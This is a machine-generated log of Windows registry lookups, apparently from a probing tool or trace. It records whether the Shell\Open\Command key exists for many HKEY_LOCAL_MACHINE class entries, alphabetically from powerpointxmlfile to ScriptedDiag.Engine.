Open Key HKEY_LOCAL_MACHINE\Software\Classes\powerpointxmlfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PPSLAX.SlideLibrary\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Presenter.MCVideoPresenter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Presenter.MCVideoPresenter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Previous.Versions\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\prffile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Printers\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PrintSys.CoFilterPipeline\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PrintSys.CoFilterPipeline.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PrintSys.CoPrintIsolationHost\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PrintSys.CoPrintIsolationHost.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Project\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectHeader.ProjectHeader\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.Link\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.PMDocument\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.PMEvents\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.PMObject\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.Project\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.RelEnum\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ProjectModel.Task\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropertyEntry\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropertyKeyCollection.PropertyKeyCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropertyKeyCollection.PropertyKeyCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropertyValue\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropRpt.VisExcelRptDriver\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropRpt.VisListRptDriver\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropRpt.VisReportDef\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropRpt.VisReportManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropRpt.VisVisioRptDriver\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropVariantCollection.PropVariantCollection\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PropVariantCollection.PropVariantCollection.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PROTOCOLS\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.AnalogCable\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.AnalogCable.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.AtscPsipParser\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.AtscPsipParser.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.ATSCTerrestrial\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.ATSCTerrestrial.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.CDvb\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.CDvb.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.CIsdb\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.CIsdb.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.DigitalCable\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.DigitalCable.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.DvbSiParser\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.DvbSiParser.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.PBDA\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Psisdecd.PBDA.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PTRegTerminal.Class\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PTRegTerminalClass.Class\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\PublishedApp\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Publisher.Application\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Publisher.Application.16\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Publisher.Document\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Publisher.Document.16\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Publisher.UriLink.16\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\publisherhtmlfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\publishermhtmlfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QC.DLQListener\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QC.ListenerHelper\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QC.MessageMover\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QC.MessageMover.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QC.Recorder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtAlphaSetter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtAlphaSetter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtCompositor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtCompositor.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtJpeg\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtJpeg.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtJpegPP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtJpegPP.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtKey\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.DxtKey.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.GrfCache\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.GrfCache.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.MediaLocator\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.MediaLocator.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.RenderEngine\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.RenderEngine.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.SmartRenderEngine\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.SmartRenderEngine.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.Xml2Dex\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\qedit.Xml2Dex.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QueryAllWinSAT\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\QueryWinSAT\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\queue\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RACplDlg.RARegSetting\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RACplDlg.RARegSetting.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RACplDlg.RASettingProperty\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RACplDlg.RASettingProperty.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RAServer.RASMapi\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RAServer.RASMapi.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RAServer.RASrv\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RAServer.RASrv.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RAServer.RemoteAssistance\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RAServer.RemoteAssistance.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ratfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RCM.ConnectionManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RCM.ConnectionManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDB.AutoPlayHandler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDBFileProperties.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDP.File\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Rdpcomapi.RDPSession\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Rdpcomapi.RDPSession.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RdpCoreKMTS.WTSProtocolManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RdpCoreKMTS.WTSProtocolManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Rdpvcomapi.RDPViewer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Rdpvcomapi.RDPViewer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDS.DataControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDS.DataControl.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDS.DataSpace\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDS.DataSpace.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDSServer.DataFactory\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RDSServer.DataFactory.6.0\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RECIP.RecipCtl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Record\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\regedit\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\regfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RegisterControl.Register\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RegisterControl.Register.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RemoteAssistance.1\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RemoteHelper.RemoteHelper\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ReplicateCatalog.ReplicateCatalog\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ReplicateCatalog.ReplicateCatalog.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RequestMakeCall.RequestMakeCall\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RequestMakeCall.RequestMakeCall.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ResourceAssignment.ResourceAssignment\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ResourceInt.ResourceInt\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ResourceManager.ResourceManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Results\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\rlefile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\rlogin\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RowPosition.RowPosition\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RowPosition.RowPosition.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\RowsetHelper\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\rqyfile\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\rtffile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpAudioFormat\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpAudioFormat.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpCompressedLexicon\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpCompressedLexicon.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpCustomStream\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpCustomStream.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpDataKey\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpDataKey.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpFileStream\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpFileStream.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpGramCompBackEnd\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpGramCompBackEnd.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpGrammarCompiler\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpGrammarCompiler.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpInProcRecoContext\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpInProcRecoContext.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpInprocRecognizer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpInprocRecognizer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpITNProcessor\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpITNProcessor.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpLexicon\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpLexicon.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMemoryStream\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMemoryStream.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMMAudioEnum\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMMAudioEnum.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMMAudioIn\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMMAudioIn.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMMAudioOut\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpMMAudioOut.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SPNotify\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SPNotify.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpNotifyTranslator\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpNotifyTranslator.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpNullPhoneConverter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpNullPhoneConverter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpObjectToken\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpObjectToken.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpObjectTokenCategory\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpObjectTokenCategory.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpObjectTokenEnum\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpObjectTokenEnum.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhoneConverter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhoneConverter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhrase\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhrase.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhraseBuilder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhraseBuilder.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhraseInfoBuilder\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpPhraseInfoBuilder.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpResourceManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpResourceManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpSharedRecoContext\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpSharedRecoContext.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpSharedRecognizer\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpSharedRecognizer.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpShortcut\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpShortcut.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpStream\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpStream.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpStreamFormatConverter\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpStreamFormatConverter.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpTextSelectionInformation\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpTextSelectionInformation.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpUncompressedLexicon\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpUncompressedLexicon.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpVoice\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpVoice.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpWaveFormatEx\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPI.SpWaveFormatEx.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPIEngine.TTSEngine\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SAPIEngine.TTSEngine.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisioSolutionDocumentMap\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisioSolutionDocumentMap.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisSaveAsWeb\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisSaveAsWeb.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisWebDispProxy\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisWebDispProxy.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisWebPageSettings\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWeb.VisWebPageSettings.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWebHF.SVGDispObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWebRaster.GIFDispObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWebRaster.JPGDispObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWebRaster.PNGDispObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWebVML.VMLDispObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SaveAsWebXAML.XAMLDispObj\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SavedDsQuery\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.AudioCD\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.AudioCD.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.BurnDevice\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.BurnDevice.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.DataBurner\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.DataBurner.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.DiscBurner\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.DiscBurner.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.SBEDeviceManager\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.SBEDeviceManager.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.VideoAudioBurner\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\SBEServer.VideoAudioBurner.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScanProfiles.ScanProfileMgr\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScanProfiles.ScanProfileMgr.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScanProfiles.ScanProfileUI\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScanProfiles.ScanProfileUI.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Schedule.Service\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Schedule.Service.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\scrfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\script\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptBridge.ScriptBridge\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptBridge.ScriptBridge.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptedDiag.Engine\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\ScriptedDiag.Engine.1\Shell\Open\Command - False 1
Fn
